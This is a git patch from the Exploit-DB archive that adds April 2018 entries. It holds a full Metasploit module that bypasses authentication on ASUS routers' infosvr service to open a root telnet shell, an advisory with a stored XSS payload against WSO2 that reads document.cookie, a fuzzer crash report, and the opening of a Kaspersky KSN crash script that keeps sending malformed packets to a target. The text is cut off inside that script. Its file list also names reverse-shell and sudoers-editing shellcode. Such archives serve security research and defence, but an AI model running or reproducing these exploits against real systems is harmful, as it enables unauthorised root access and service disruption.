From c249d94cb794810d2899571f96439e0d2d6452e3 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 25 Apr 2018 05:01:39 +0000
Subject: [PATCH] DB: 2018-04-25

28 changes to exploits/shellcodes

gif2apng 1.9 - '.gif' Stack Buffer Overflow
VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 - Memory Corruption (PoC)
Kaspersky KSN for Linux 5.2 - Memory Corruption
Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service
Adobe Flash - Overflow when Playing Sound
Adobe Flash - Overflow in Slab Rendering
Adobe Flash - Info Leak in Image Inflation
Adobe Flash - Out-of-Bounds Write in blur Filtering
Chrome V8 JIT - 'NodeProperties::InferReceiverMaps' Type Confusion
R 3.4.4 - Local Buffer Overflow
Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)
lastore-daemon D-Bus - Privilege Escalation (Metasploit)
Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass)
ASUS infosvr - Auth Bypass Command Execution (Metasploit)
UK Cookie Consent - Persistent Cross-Site Scripting
WUZHI CMS 4.1.0 - Cross-Site Request Forgery
Open-AudIT 2.1 - CSV Macro Injection
Monstra CMS 3.0.4 - Arbitrary Folder Deletion
Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass
Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure
WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion
WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting

Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes)
Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode
Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes)
Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)
Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)
---
 exploits/hardware/remote/44524.rb  | 141 ++++++++++++++++
 exploits/java/webapps/44531.txt    | 131 +++++++++++++++
 exploits/linux/dos/44519.txt       |  91 +++++++++++
 exploits/linux/dos/44521.py        | 254 +++++++++++++++++++++++++++++
 exploits/linux/local/44523.rb      | 172 +++++++++++++++++++
 exploits/multiple/dos/44526.txt    |   7 +
 exploits/multiple/dos/44527.txt    |   7 +
 exploits/multiple/dos/44528.txt    |   7 +
 exploits/multiple/dos/44529.txt    |   7 +
 exploits/multiple/dos/44530.js     |  80 +++++++++
 exploits/php/webapps/44503.txt     |  51 ++++++
 exploits/php/webapps/44504.txt     |  23 +++
 exploits/php/webapps/44512.txt     |  44 +++++
 exploits/php/webapps/44513.py      | 156 ++++++++++++++++++
 exploits/php/webapps/44515.py      | 138 ++++++++++++++++
 exploits/php/webapps/44520.html    |  42 +++++
 exploits/windows/dos/44514.py      |  62 +++++++
 exploits/windows/dos/44525.py      | 156 ++++++++++++++++++
 exploits/windows/local/44516.py    |  83 ++++++++++
 exploits/windows/local/44518.py    |  55 +++++++
 exploits/windows/remote/44522.py   | 192 ++++++++++++++++++++++
 exploits/windows/webapps/44511.txt |  50 ++++++
 files_exploits.csv                 |  22 +++
 files_shellcodes.csv               |   6 +
 shellcodes/linux_x86/44505.c       |  81 +++++++++
 shellcodes/linux_x86/44507.c       |  71 ++++++++
 shellcodes/linux_x86/44508.c       |  68 ++++++++
 shellcodes/linux_x86/44509.c       |  47 ++++++
 shellcodes/linux_x86/44510.c       |  60 +++++++
 shellcodes/linux_x86/44517.c       |  54 ++++++
 30 files changed, 2358 insertions(+)
 create mode 100755 exploits/hardware/remote/44524.rb
 create mode 100644 exploits/java/webapps/44531.txt
 create mode 100644 exploits/linux/dos/44519.txt
 create mode 100755 exploits/linux/dos/44521.py
 create mode 100755 exploits/linux/local/44523.rb
 create mode 100644 exploits/multiple/dos/44526.txt
 create mode 100644 exploits/multiple/dos/44527.txt
 create mode 100644 exploits/multiple/dos/44528.txt
 create mode 100644 exploits/multiple/dos/44529.txt
 create mode 100644 exploits/multiple/dos/44530.js
 create mode 100644 exploits/php/webapps/44503.txt
 create mode 100644 exploits/php/webapps/44504.txt
 create mode 100644 exploits/php/webapps/44512.txt
 create mode 100755 exploits/php/webapps/44513.py
 create mode 100755 exploits/php/webapps/44515.py
 create mode 100644 exploits/php/webapps/44520.html
 create mode 100755 exploits/windows/dos/44514.py
 create mode 100755 exploits/windows/dos/44525.py
 create mode 100755 exploits/windows/local/44516.py
 create mode 100755 exploits/windows/local/44518.py
 create mode 100755 exploits/windows/remote/44522.py
 create mode 100644 exploits/windows/webapps/44511.txt
 create mode 100644 shellcodes/linux_x86/44505.c
 create mode 100644 shellcodes/linux_x86/44507.c
 create mode 100644 shellcodes/linux_x86/44508.c
 create mode 100644 shellcodes/linux_x86/44509.c
 create mode 100644 shellcodes/linux_x86/44510.c
 create mode 100644 shellcodes/linux_x86/44517.c

diff --git a/exploits/hardware/remote/44524.rb b/exploits/hardware/remote/44524.rb
new file mode 100755
index 000000000..eb6c9c9b6
--- /dev/null
+++ b/exploits/hardware/remote/44524.rb
@@ -0,0 +1,141 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'ASUS infosvr Auth Bypass Command Execution',
+      'Description' => %q{
+        This module exploits an authentication bypass vulnerability in the
+        infosvr service running on UDP port 9999 on various ASUS routers to
+        execute arbitrary commands as root.
+
+        This module launches the BusyBox Telnet daemon on the port specified
+        in the TelnetPort option to gain an interactive remote shell.
+
+        This module was tested successfully on an ASUS RT-N12E with firmware
+        version 2.0.0.35.
+
+        Numerous ASUS models are reportedly affected, but untested.
+      },
+      'Author'      =>
+        [
+          'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
+          'jduck', # Independent discovery and C exploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'References'  =>
+        [
+          ['CVE', '2014-9583'],
+          ['EDB', '35688'],
+          ['URL', 'https://github.com/jduck/asus-cmd']
+        ],
+      'DisclosureDate' => 'Jan 4 2015',
+      'Privileged'     => true,
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'Targets'        => [['Automatic', {}]],
+      'DefaultTarget'  => 0))
+    register_options [
+      Opt::RPORT(9999),
+      OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),
+      OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),
+      OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])
+    ]
+    register_advanced_options [
+      # If the session is killed (CTRL+C) rather than exiting cleanly,
+      # the telnet port remains open, but is unresponsive, and prevents
+      # re-exploitation until the device is rebooted.
+      OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])
+    ]
+  end
+
+  def telnet_timeout
+    (datastore['TelnetTimeout'] || 10)
+  end
+
+  def telnet_port
+    datastore['TelnetPort']
+  end
+
+  def request(cmd)
+    pkt = ''
+    # ServiceID   [byte]      ; NET_SERVICE_ID_IBOX_INFO
+    pkt << "\x0C"
+    # PacketType  [byte]      ; NET_PACKET_TYPE_CMD
+    pkt << "\x15"
+    # OpCode      [word]      ; NET_CMD_ID_MANU_CMD
+    pkt << "\x33\x00"
+    # Info        [dword]     ; Comment: "Or Transaction ID"
+    pkt << Rex::Text.rand_text_alphanumeric(4)
+    # MacAddress  [byte[6]]   ; Double-wrongly "checked" with memcpy instead of memcmp
+    pkt << Rex::Text.rand_text_alphanumeric(6)
+    # Password    [byte[32]]  ; Not checked at all
+    pkt << "\x00" * 32
+    # Command Length + \x00 + Command padded to 512 bytes
+    pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust((512 - pkt.length), "\x00")
+  end
+
+  def exploit
+    connect_udp
+    print_status "#{rhost} - Starting telnetd on port #{telnet_port}..."
+    udp_sock.put request "telnetd -l /bin/sh -p #{telnet_port}"
+    disconnect_udp
+
+    vprint_status "#{rhost} - Waiting for telnet service to start on port #{telnet_port}..."
+    Rex.sleep 3
+
+    vprint_status "#{rhost} - Connecting to #{rhost}:#{telnet_port}..."
+
+    sock = Rex::Socket.create_tcp 'PeerHost' => rhost,
+                                  'PeerPort' => telnet_port,
+                                  'Context'  => { 'Msf' => framework, 'MsfExploit' => self },
+                                  'Timeout'  => telnet_timeout
+
+    if sock.nil?
+      fail_with Failure::Unreachable, "Telnet service unreachable on port #{telnet_port}"
+    end
+
+    vprint_status "#{rhost} - Trying to establish a telnet session..."
+
+    prompt = negotiate_telnet sock
+    if prompt.nil?
+      sock.close
+      fail_with Failure::Unknown, 'Unable to establish a telnet session'
+    end
+
+    print_good "#{rhost} - Telnet session successfully established..."
+
+    handler sock
+  end
+
+  def negotiate_telnet(sock)
+    prompt = '#'
+    Timeout.timeout(datastore['TelnetBannerTimeout']) do
+      while true
+        data = sock.get_once(-1, telnet_timeout)
+        if !data or data.length == 0
+          return nil
+        elsif data.include? prompt
+          return true
+        end
+      end
+    end
+  rescue ::Timeout::Error
+    return nil
+  end
+end
\ No newline at end of file
diff --git a/exploits/java/webapps/44531.txt b/exploits/java/webapps/44531.txt
new file mode 100644
index 000000000..5b72254ae
--- /dev/null
+++ b/exploits/java/webapps/44531.txt
@@ -0,0 +1,131 @@
+SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
+=======================================================================
+              title: Multiple Stored XSS Vulnerabilities
+            product: WSO2 Carbon, WSO2 Dashboard Server
+ vulnerable version: WSO2 Identity Server 5.3.0
+      fixed version: WSO2 Identity Server 5.5.0
+         CVE number: CVE-2018-8716
+             impact: high
+           homepage: https://wso2.com/products/dashboard
+              found: 2017-12-13
+                 by: W. Schober (Office Vienna)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Europe | Asia | North America
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"WSO2 Carbon redefines middleware by providing an integrated and componentized
+middleware platform that adapts to the specific needs of any enterprise
+IT project - on premise or in the cloud.
+100% open source and standards-based, WSO2 Carbon enables developers to rapidly
+orchestrate business processes, compose applications and develop services using
+WSO2 Developer Studio and a broad range of business and technical services that
+integrate with legacy, packaged and SaaS applications.
+The lean, complete, OSGi-based platform includes more than 175 components – OSGi
+bundles or Carbon features. The WSO2 Carbon core framework functions as
+“Eclipse for servers” and includes common capabilities shared by all WSO2
+products, such as built-in registry, user management, transports, security,
+logging, clustering, caching and throttling services, co-ordination, and a
+GUI framework."
+
+Source: https://wso2.com/products/carbon/
+
+"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
+rapidly create visually appealing and engaging web components such as
+dashboards, and gadgets, and unlocking data for business intelligence and
+monitoring. With the host of capabilities that Dashboard Server provides
+out-of-the-box, going from data to screen has never been easier."
+
+Source: https://wso2.com/products/dashboard-server/
+
+
+Business recommendation:
+------------------------
+SEC Consult recommends to perform a thorough security review conducted by
+security professionals to identify and resolve all security issues.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
+The dashboard is used by the end-users to manage their accounts, change passwords,
+alter their profiles, or change certain settings. An attacker is able to inject
+arbitrary JavaScript payloads into various textboxes (username, home address,
+lastname, firstname, etc).
+
+The payloads are permanently stored in the dashboard and triggered every time the
+dashboard is visited. The payload is also potentially triggered in the carbon
+part of WSO2, which means that an attacker would be able to inject payloads
+from the front-end application into a middleware application, which is not
+accessible from the internet and attack administrators.
+
+2) Stored Cross-Site Scripting in WSO2 Carbon
+The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
+host URL an arbitrary JavaScript payload can be injected and permanently stored
+in the web application.
+
+
+Proof of concept:
+-----------------
+1) Stored Cross-Site Scripting in WS02 Dashboard
+The following input fields are vulnerable and JavaScript payloads can be directly
+injected:
+- Firstname
+- Lastname
+- Username
+- Address
+
+It is suspected, that all user inputs are returned unfiltered in all server responses.
+
+2) Stored Cross-Site Scripting in WSO2 Carbon
+To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set
+the URL to the following payload: "><img src=x onerror=aler(document.cookie)>
+
+Everytime the carbon middleware application is accessed, the payload is triggered.
+
+
+Vulnerable / tested versions:
+-----------------------------
+The following version has been tested which was the most recent version
+at the time of discovery:
+
+* WSO2IS 5.3.0
+
+
+Vendor contact timeline:
+------------------------
+2018-01-25: Contacting vendor through security@wso2.com
+2018-02-08: Asking for status update. Vendor responds, that they are
+            still investigating the issue.
+2018-02-21: Vendor responds with release date and further details
+            concerning the nature of the vulnerabilities. The XSS in the
+            Carbon component was a duplicate and should be already fixed.
+            Concerning the XSS in the dashboard a fix is implemented
+            and will be rolled out with the release of WSO2 Identity
+            Server 5.5.0.
+2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
+2018-03-15: Mitre assigned CVE-2018-8716.
+2018-03-26: Vendor informed us, that the final release of the updated
+            software will be on 5th of April.
+2018-04-23: Public Release
+
+
+Solution:
+---------
+Update WSO2 Identity Server to 5.5.0
+
+
+Workaround:
+-----------
+No workaround available
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
\ No newline at end of file
diff --git a/exploits/linux/dos/44519.txt b/exploits/linux/dos/44519.txt
new file mode 100644
index 000000000..8cbff039e
--- /dev/null
+++ b/exploits/linux/dos/44519.txt
@@ -0,0 +1,91 @@
+# Exploit Title: gif2apng 1.9 '.gif' Stack-Buffer Overflow
+# Date: 20 April 2018
+# Exploit Author: Hamm3r.py
+# Vendor Homepage: http://gif2apng.sourceforge.net/
+# Version: 1.9
+# Tested on: Ubuntu 16.04
+# CVE :
+
+gif2apng is vulnerable to a stack based buffer overflow when a malformed
+gif is supplied. Following is the stack trace:
+
+$ ./gif2apng fuzz.gif
+
+gif2apng 1.9 using 7ZIP with 15 iterations
+
+Reading 'fuzz.gif'...
+=================================================================
+==3674==ERROR: AddressSanitizer: stack-buffer-overflow on address
+0x7fffb183bcf1 at pc 0x0000004ebdce bp 0x7fffb1837a90 sp
+0x7fffb1837a88
+WRITE of size 1 at 0x7fffb183bcf1 thread T0
+#0 0x4ebdcd (/home/shyam/FUZZ/gif2apng+0x4ebdcd)
+#1 0x4ee926 (/home/shyam/FUZZ/gif2apng+0x4ee926)
+#2 0x7f4e5642282f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
+#3 0x4199a8 (/home/shyam/FUZZ/gif2apng+0x4199a8)
+
+Address 0x7fffb183bcf1 is located in stack of thread T0 at offset 16977 in frame
+#0 0x4eb23f (/home/shyam/FUZZ/gif2apng+0x4eb23f)
+
+This frame has 6 object(s):
+[32, 36) 'size'
+[48, 8242) 'prefix'
+[8512, 12609) 'suffix'
+[12880, 16977) 'str' <== Memory access at offset 16977 overflows
+this variable
+[17248, 18272) 'data'
+[18400, 18401) 'mincodesize'
+HINT: this may be a false positive if your program uses some custom
+stack unwind mechanism or swapcontext
+(longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow
+(/home/shyam/FUZZ/gif2apng+0x4ebdcd)
+Shadow bytes around the buggy address:
+0x1000762ff740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+0x1000762ff750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+0x1000762ff760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+0x1000762ff770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+0x1000762ff780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x1000762ff790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]f2
+0x1000762ff7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
+0x1000762ff7b0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
+0x1000762ff7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+0x1000762ff7d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+0x1000762ff7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+Addressable: 00
+Partially addressable: 01 02 03 04 05 06 07
+Heap left redzone: fa
+Heap right redzone: fb
+Freed heap region: fd
+Stack left redzone: f1
+Stack mid redzone: f2
+Stack right redzone: f3
+Stack partial redzone: f4
+Stack after return: f5
+Stack use after scope: f8
+Global redzone: f9
+Global init order: f6
+Poisoned by user: f7
+Container overflow: fc
+Array cookie: ac
+Intra object redzone: bb
+ASan internal: fe
+Left alloca redzone: ca
+Right alloca redzone: cb
+==3674==ABORTING
+
+
+Version of software in use:
+
+./gif2apng
+
+gif2apng 1.9
+
+#This issue is identified by Hamm3r.py, a general purpose fuzzer!
+https://github.com/0xshyam/hamm3r.py
+
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44519.zip
\ No newline at end of file
diff --git a/exploits/linux/dos/44521.py b/exploits/linux/dos/44521.py
new file mode 100755
index 000000000..abb6200d7
--- /dev/null
+++ b/exploits/linux/dos/44521.py
@@ -0,0 +1,254 @@
+'''
+# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
+#
+# Tested on: Kali i686 GNU/Linux
+# CVE: NotYet
+#
+# Exploit description:
+# Kaspersky KSN v5.2 is prone to a remote memory corruption because it
+fails to properly filter the input on the remote subscribers, this
+leads to heap segments overwrite
+# and it leads to remote code execution.
+#
+#
+# Program description:
+# Kaspersky KSN for Linux enables cloud-assisted, multi-layered
+security for servers and workstations running the Linux operating
+system. It delivers reliable protection with minimal impact on
+# performance.
+# Product homepage: http://kaspersky.com
+#
+# Example usage: python kaspersky.py 192.168.1.1 6349
+#
+# [!] Valgrind output:
+#
+# =3314== Invalid write of size 4
+# ==3314==    at 0x24FA74:
+RespObject::SetSimpleString(std::__cxx11::basic_string<char,
+std::char_traits<char>, std::allocator<char> > const&) (in
+/usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x241814: RequestParser::Parse(unsigned char*,
+unsigned long, std::function<void (RespObject const&)>) (in
+/usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x23B740:
+Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
+boost::asio::stream_socket_service<boost::asio::ip::tcp> >
+>::HandleRead(boost::system::error_code const&, unsigned long) (in
+/usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x22FF56:
+boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
+boost::_bi::bind_t<void, boost::_mfi::mf2<void,
+Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
+boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
+boost::system::error_code const&, unsigned long>,
+boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
+boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
+boost::arg<1> (*)(), boost::arg<2> (*)()> >
+>::do_complete(boost::asio::detail::task_io_service*,
+boost::asio::detail::task_io_service_operation*,
+boost::system::error_code const&, unsigned long) (in
+/usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x23647C:
+boost::asio::detail::task_io_service::run(boost::system::error_code&)
+(in /usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
+# ==3314==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
+# ==3314==
+# ==3314==
+# ==3314== Process terminating with default action of signal 11
+(SIGSEGV): dumping core
+# ==3314==  Access not within mapped region at address 0x0
+# ==3314==    at 0x24FA74:
+RespObject::SetSimpleString(std::__cxx11::basic_string<char,
+std::char_traits<char>, std::allocator<char> > const&) (in
+/usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x241814: RequestParser::Parse(unsigned char*,
+unsigned long, std::function<void (RespObject const&)>) (in
+/usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x23B740:
+Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
+boost::asio::stream_socket_service<boost::asio::ip::tcp> >
+>::HandleRead(boost::system::error_code const&, unsigned long) (in
+/usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x22FF56:
+boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
+boost::_bi::bind_t<void, boost::_mfi::mf2<void,
+Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
+boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
+boost::system::error_code const&, unsigned long>,
+boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
+boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
+boost::arg<1> (*)(), boost::arg<2> (*)()> >
+>::do_complete(boost::asio::detail::task_io_service*,
+boost::asio::detail::task_io_service_operation*,
+boost::system::error_code const&, unsigned long) (in
+/usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x23647C:
+boost::asio::detail::task_io_service::run(boost::system::error_code&)
+(in /usr/local/ksn/bin/rocksdb-server)
+# ==3314==    by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
+# ==3314==  If you believe this happened as a result of a stack
+# ==3314==  overflow in your program's main thread (unlikely but
+# ==3314==  possible), you can try to increase the size of the
+# ==3314==  main thread stack using the --main-stacksize= flag.
+# ==3314==  The main thread stack size used in this run was 8388608.
+# ==3314==
+# ==3314== HEAP SUMMARY:
+# ==3314==     in use at exit: 769,426 bytes in 7,522 blocks
+# ==3314==   total heap usage: 15,342 allocs, 7,820 frees, 1,354,534
+bytes allocated
+# ==3314==
+# ==3314== LEAK SUMMARY:
+# ==3314==    definitely lost: 8 bytes in 1 blocks
+# ==3314==    indirectly lost: 0 bytes in 0 blocks
+# ==3314==      possibly lost: 5,328 bytes in 9 blocks
+# ==3314==    still reachable: 764,090 bytes in 7,512 blocks
+# ==3314==                       of which reachable via heuristic:
+# ==3314==                         newarray           : 8,264 bytes in 4 blocks
+# ==3314==         suppressed: 0 bytes in 0 blocks
+#
+# [!] Debugger output:
+#
+# [----------------------------------registers-----------------------------------]
+# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 -->
+0x7f7ee1d4f090 --> 0x7f7ee1894760
+(<_ZN5boost4asio6detail15task_io_serviceD2Ev>:  push   r13)
+# RBX: 0x0
+# RCX: 0x7f7ee2913000 --> 0x0
+# RDX: 0xffffffffffdf6bf0
+# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
+0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
+(<_ZN5boost4asio6detail15task_io_serviceD2Ev>:       push   r13)
+# RDI: 0x0
+# RBP: 0x7f7ee28f5338 --> 0x81
+# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
+# RIP: 0x7f7ee18b3a74
+(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
+      mov    DWORD PTR [rdi],0x1)
+# R8 : 0x0
+# R9 : 0x7
+# R10: 0x2
+# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800
+# R12: 0x29b
+# R13: 0x0
+# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
+0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
+(<_ZN5boost4asio6detail15task_io_serviceD2Ev>:       push   r13)
+# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b
+# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT
+direction overflow)
+# [-------------------------------------code-------------------------------------]
+#    0x7f7ee18b3a6e:      xchg   ax,ax
+#    0x7f7ee18b3a70
+<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>:
+   push   rbx
+#    0x7f7ee18b3a71
+<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>:
+ mov    rbx,rdi
+# => 0x7f7ee18b3a74
+<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
+ mov    DWORD PTR [rdi],0x1
+#    0x7f7ee18b3a7a
+<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>:
+lea    rdi,[rdi+0x10]
+#    0x7f7ee18b3a7e
+<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>:
+call   0x7f7ee184a8a0
+<_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_assignERKS4_@plt>
+#    0x7f7ee18b3a83
+<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>:
+mov    BYTE PTR [rbx+0x4],0x0
+#    0x7f7ee18b3a87
+<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>:
+pop    rbx
+# [------------------------------------stack-------------------------------------]
+# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
+# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815
+(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>:
+ mov    rdi,QWORD PTR [rsp+0x110])
+# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd
+# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045
+# 0032| 0x7ffe127425e0 --> 0x361
+# 0040| 0x7ffe127425e8 --> 0x0
+# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 -->
+0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...)
+# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0
+# [------------------------------------------------------------------------------]
+# Legend: code, data, rodata, value
+# Stopped reason: SIGSEGV
+# 0x00007f7ee18b3a74 in
+RespObject::SetSimpleString(std::__cxx11::basic_string<char,
+std::char_traits<char>, std::allocator<char> > const&) ()
+# gdb-peda$ where
+# #0  0x00007f7ee18b3a74 in
+RespObject::SetSimpleString(std::__cxx11::basic_string<char,
+std::char_traits<char>, std::allocator<char> > const&) ()
+# #1  0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*,
+unsigned long, std::function<void (RespObject const&)>) ()
+# #2  0x00007f7ee189f741 in
+Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
+boost::asio::stream_socket_service<boost::asio::ip::tcp> >
+>::HandleRead(boost::system::error_code const&, unsigned long
+'''
+
+import binascii
+import sys
+import socket
+import time
+
+def rocksDB(target,port):
+    try:
+        while 1:
+            # Open socket
+            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            # Set reuse ON
+            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+            # Bind port
+            s.connect((target, port))
+            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
+"Connected to:"), target, port
+            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
+"Establishing connection.. ")
+            packet =
+binascii.unhexlify(b'4500036100010000400679947f0000017f000001001419100000000000000000500220009e1700005ce528736b32895950f96218411ca66c9b0842c995eacbfc3eacd8187d3aa8488e1cf1f18491606b9c400c42ec88e7399baa7c3b0bca43de853c74d2fbb2c08c9868ad9688b815d6e5a913937ff05217e18ff28d379fa6985204f7f529990a675d2fc70e1a7dbca8334e4faf30ea31cb33f0c1fabbfc92fbaf20d7e63cfe65ee95711a80a406c26b6e60335d74a02b42a454bc6bbcf5153cb20b77c9686b2fff994b224a3dc5fcbd12a562159d845a8b039abf971bb7c79fe74ca7055560c9c513377881b7a033eb797738fc119758f4c6ea1a960cab1299f5b1a6e99e0be889d8bdf05edc7ca6f14a48d35a5f747887e2330a5cc8b722257ecf32987ad1e24aa56c4685fdae028ca7689bdb66b3d951b8021a34a04114f4208c3f9a6d66bcb7cbeec80a716d69375a88202f3cac2562c9595095c61e693080edd5a3318084d974a2130d5cfe439903d6d5b9b3b553143831c6e01f286da4a2339c91cfce00fe17d7584153ab93e723ce2e859d7aaa9f9574af2dbb4ca4d9f8c8f39f4e89a790e5e4e74bbfd44a721594362f1c71cc48721014f451b837aff64624ea8fbc767c50ada655f23c87195b49b854c3e0d69f1585b663a02ad33cfdfd78c43e3531d6802b7271b7518ded3d93338084ca0e7982dc7c76d82c1b0fed91e5dc567262f46e3bd71b66f9d8283784d666a2be99e397a4abe9495168c880d7f371b87f44b38e61d836ccad8afc8c99518fa1240ab5a2a0685a9d450f4b44fefcc6b64ce8f6ec836922670b31ebf62ea5933e272a62ac8ff2c79d8f15a1220a37e5535ec0998aaf8af2f9d0a0f75e96fad8e8b1